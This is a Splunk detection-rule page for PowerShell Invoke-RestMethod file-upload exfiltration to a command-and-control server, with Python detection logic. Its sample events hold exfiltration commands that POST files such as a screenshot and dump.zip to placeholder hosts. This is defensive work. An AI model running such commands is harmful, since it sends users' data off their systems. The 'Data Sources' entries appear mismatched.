
Windows Exfiltration Over C2 Via Invoke RestMethod

Splunk Security Content

Summary
This analytic rule detects potential data exfiltration through PowerShell's Invoke-RestMethod function. It specifically targets activity that uploads files via HTTP POST requests, which may indicate that an attacker is transferring sensitive information such as files or screenshots to a remote command and control (C2) server. The rule uses PowerShell Script Block Logging (Event ID 4104) to identify these suspicious script executions across systems. Because this activity points to a possible data breach and unauthorized access to sensitive data, investigating such anomalies is critical to limit the risk of data loss and system compromise. Proper implementation requires PowerShell Script Block Logging to be enabled on the relevant endpoints. The rule strengthens security monitoring in Windows environments by alerting promptly on potentially malicious file transfers over the network.
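The following is an added illustration of the matching logic the summary describes, not Splunk's own search: it walks a few constructed Event ID 4104 records and flags script blocks that combine Invoke-RestMethod, an HTTP POST and a file upload. The field names, the irm alias and the use of -InFile as the upload indicator are assumptions made for this example.

```python
import re

# Constructed sample Event ID 4104 records (not real telemetry). Field names
# follow the Windows event schema as an assumption; only the fields the
# detection needs are modelled.
SAMPLE_EVENTS = [
    {"EventCode": 4104, "Computer": "ws01.corp.example",
     "ScriptBlockText": "Invoke-RestMethod -Uri 'https://upload.example.invalid/f' "
                        "-Method Post -InFile 'C:\\Users\\a\\Pictures\\screen.png'"},
    {"EventCode": 4104, "Computer": "ws02.corp.example",
     "ScriptBlockText": "irm https://upload.example.invalid/f -Method POST -InFile .\\dump.zip"},
    {"EventCode": 4104, "Computer": "ws03.corp.example",
     "ScriptBlockText": "Invoke-RestMethod -Uri 'https://api.example.invalid/v1' -Method Get"},
    {"EventCode": 4104, "Computer": "ws04.corp.example",
     "ScriptBlockText": "Invoke-RestMethod -Uri 'https://api.example.invalid/v1' -Method Post -Body $json"},
    {"EventCode": 4103, "Computer": "ws05.corp.example",   # not a script-block record; ignored
     "ScriptBlockText": "Invoke-RestMethod -Uri x -Method Post -InFile y"},
]

# Matching criteria assumed for this example: the cmdlet (or its irm alias),
# an HTTP POST, and the -InFile parameter that sends a file as the request body.
CMDLET = re.compile(r"\b(Invoke-RestMethod|irm)\b", re.IGNORECASE)
POST = re.compile(r"-Method\s+['\"]?Post\b", re.IGNORECASE)
INFILE = re.compile(r"-InFile\b", re.IGNORECASE)
URI = re.compile(r"(?:-Uri\s+)?['\"]?(https?://[^\s'\"]+)", re.IGNORECASE)


def matches(script_block: str) -> bool:
    """True when a script block shows a file being POSTed with Invoke-RestMethod."""
    return bool(CMDLET.search(script_block)
                and POST.search(script_block)
                and INFILE.search(script_block))


def find_uploads(events):
    """Return one finding per matching 4104 event, with the destination URI if visible."""
    findings = []
    for ev in events:
        if ev.get("EventCode") != 4104:          # only Script Block Logging records
            continue
        text = ev.get("ScriptBlockText", "")
        if not matches(text):
            continue
        m = URI.search(text)
        findings.append({"Computer": ev["Computer"],
                         "uri": m.group(1) if m else None,
                         "technique": "T1041"})   # Exfiltration Over C2 Channel
    return findings


if __name__ == "__main__":
    for f in find_uploads(SAMPLE_EVENTS):
        print(f"{f['Computer']}: POST file upload to {f['uri']} ({f['technique']})")
```

The GET call and the POST with an in-memory -Body are deliberately left unflagged, matching the summary's focus on file uploads; a production search would also join host and user context for triage.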
Categories
  • Endpoint
  • Windows
Data Sources
  • Persona
  • Pod
ATT&CK Techniques
  • T1041
Created: 2024-11-13